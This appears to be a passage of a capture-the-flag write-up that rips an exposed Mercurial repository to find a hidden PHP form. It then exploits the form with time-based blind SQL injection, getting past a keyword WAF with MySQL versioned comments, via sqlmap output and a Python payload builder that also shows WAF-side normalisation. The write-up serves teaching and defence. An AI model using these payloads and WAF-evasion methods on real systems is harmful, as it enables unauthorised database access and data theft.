```
$ ~/CTF/tools/dvcs-ripper/rip-hg.pl -v -u http://liar.inctf.in/.hg/
[i] Downloading hg files from http://liar.inctf.in/.hg/
[i] Auto-detecting 404 as 200 with 3 requests
[i] Getting correct 404 responses
[d] found 00changelog.i
[d] found dirstate
[d] found requires
[d] found branch
[!] Not found for branchheads.cache: 404 Not Found
[d] found last-message.txt
[!] Not found for tags.cache: 404 Not Found
[d] found undo.branch
[d] found undo.desc
[d] found undo.dirstate
[d] found store/00changelog.i
[!] Not found for store/00changelog.d: 404 Not Found
[d] found store/00manifest.i
[!] Not found for store/00manifest.d: 404 Not Found
[d] found store/fncache
[d] found store/undo
[!] Not found for .hgignore: 404 Not Found
[i] Running hg status to check for missing items
[i] Got items with hg status: 3
[!] Not found for store/data/.hgignore.d: 404 Not Found
[!] Not found for store/data/.hgignore.i: 404 Not Found
[!] Not found for store/data/1ts_h4rd_t0_gu3ss/index.html.d: 404 Not Found
[!] Not found for store/data/1ts_h4rd_t0_gu3ss/index.html.i: 404 Not Found
[!] Not found for store/data/1ts_h4rd_t0_gu3ss/vulnerable.php.d: 404 Not Found
[!] Not found for store/data/1ts_h4rd_t0_gu3ss/vulnerable.php.i: 404 Not Found
[!] Not found for store/data/index.html.d: 404 Not Found
[d] found store/data/index.html.i
[i] Finished (1 of 4)
```
The ripped repository's dirstate tracks files whose content could not be downloaded from `store/data/`, so `hg status` reports them as missing (`!`). Their content is not in the recovered Mercurial repository, but their paths are, which reveals other files present on the web server.
```
$ hg status
! .hgignore
! 1ts_h4rd_t0_gu3ss/index.html
! 1ts_h4rd_t0_gu3ss/vulnerable.php
```
`1ts_h4rd_t0_gu3ss/index.html` has a form that submits to `1ts_h4rd_t0_gu3ss/vulnerable.php`, and there is a comment hidden in the page source:
```html
<!--Could You beat our security!!!--!>
<!--Can you find the phone number of my friend, I guess it is stored in some table, I think it is in phone column--!>
```
So the hint points at an SQL injection in the form handled by `vulnerable.php`, with the goal of reading a `phone` column from some table.
I first tested by hand whether any input was being filtered.
All SQL keywords were detected by a WAF, but wrapping them in MySQL versioned comments (for example `/*!50000SELECT*/`) worked.
Then I tried sqlmap, but the WAF detected the automated tool, so I told sqlmap to use a custom User-Agent (`--user-agent`) and my session cookie (`--cookie`).
```
Parameter: name (POST)
    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 OR time-based blind
    Payload: name=john') OR SLEEP(5) AND ('PuTF'='PuTF
    Vector: OR [RANDNUM]=IF(([INFERENCE]),SLEEP([SLEEPTIME]),[RANDNUM])

web server operating system: Linux Ubuntu
web application technology: Nginx
back-end DBMS: MySQL >= 5.0.12
```
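The following is an added example, not code from the original writeup or from the challenge, that models the two technical points above: why a keyword-blocklist WAF lets MySQL versioned comments through, and how sqlmap's reported time-based vector is filled in to ask one yes/no question per request. The blocklist is a constructed stand-in for the CTF WAF (its real rules are unknown), the `50000` version tag and the `information_schema` probe are my assumptions, and the prefix, suffix and vector strings are taken from the sqlmap output. A whole-word rule such as `\bSLEEP\b` never fires on `/*!50000SLEEP*/` because the version digits touch the keyword and leave no word boundary, while MySQL still executes the comment body. The last function shows the normalisation a WAF would need to do before matching.

```python
"""Added example: MySQL versioned-comment WAF bypass and time-based blind payload.

Not part of the original writeup.  The blocklist is a constructed approximation
of the CTF WAF; prefix/suffix/vector come from the sqlmap output on the page.
"""
import re

# Constructed blocklist standing in for the CTF WAF (assumption: whole-word matching).
BLOCKED = ("select", "union", "from", "where", "or", "and", "if", "sleep")
_BLOCK_RE = re.compile(r"\b(" + "|".join(BLOCKED) + r")\b", re.IGNORECASE)

# From the sqlmap output: injection boundary and the time-based inference vector.
PREFIX, SUFFIX = "john') ", " AND ('PuTF'='PuTF"
VECTOR = "OR [RANDNUM]=IF(([INFERENCE]),SLEEP([SLEEPTIME]),[RANDNUM])"

# Assumed first question to ask, grounded in the hint: is there a 'phone' column anywhere?
PHONE_COLUMN_EXISTS = (
    "(SELECT COUNT(*) FROM information_schema.columns WHERE column_name='phone')>0"
)


def naive_waf_blocks(value: str) -> bool:
    """Whole-word keyword blocklist, the way a simplistic WAF rule is written."""
    return _BLOCK_RE.search(value) is not None


def build_time_payload(inference: str, randnum: int = 1337, sleeptime: int = 5) -> str:
    """Fill sqlmap's vector: the response stalls for SLEEPTIME seconds only if
    INFERENCE is true, otherwise IF() returns RANDNUM and the OR is a no-op."""
    body = (
        VECTOR.replace("[RANDNUM]", str(randnum))
        .replace("[INFERENCE]", inference)
        .replace("[SLEEPTIME]", str(sleeptime))
    )
    return PREFIX + body + SUFFIX


def versioned(value: str, version: str = "50000") -> str:
    """Wrap each blocked keyword in a MySQL executable comment.  MySQL parses the
    body as SQL when its version is >= the tag; the digits glued to the keyword
    remove the word boundary the WAF rule relies on.  Whether MySQL accepts every
    wrapped token must be confirmed against the target (the writeup says it did)."""
    return _BLOCK_RE.sub(lambda m: f"/*!{version}{m.group(1)}*/", value)


def normalise_mysql_comments(value: str) -> str:
    """What a WAF should do before matching: unwrap executable comments (MySQL
    runs their body) and discard ordinary block comments (MySQL ignores them)."""
    value = re.sub(r"/\*!\d{0,5}", " ", value)            # '/*!50000OR*/' -> ' OR*/'
    value = re.sub(r"/\*.*?\*/", " ", value, flags=re.S)  # '/**/' -> ' '
    return value.replace("*/", " ")                       # closers left from step one


if __name__ == "__main__":
    plain = build_time_payload(PHONE_COLUMN_EXISTS)
    evasive = versioned(plain)
    print("plain    :", plain, "| blocked:", naive_waf_blocks(plain))
    print("versioned:", evasive, "| blocked:", naive_waf_blocks(evasive))
    print("normalised then checked | blocked:",
          naive_waf_blocks(normalise_mysql_comments(evasive)))
```

Each request built this way answers one boolean question by timing alone, which is why sqlmap needs many requests per extracted character; sqlmap can do the keyword wrapping itself with its `versionedkeywords` tamper script, alongside the `--user-agent` and `--cookie` options used above.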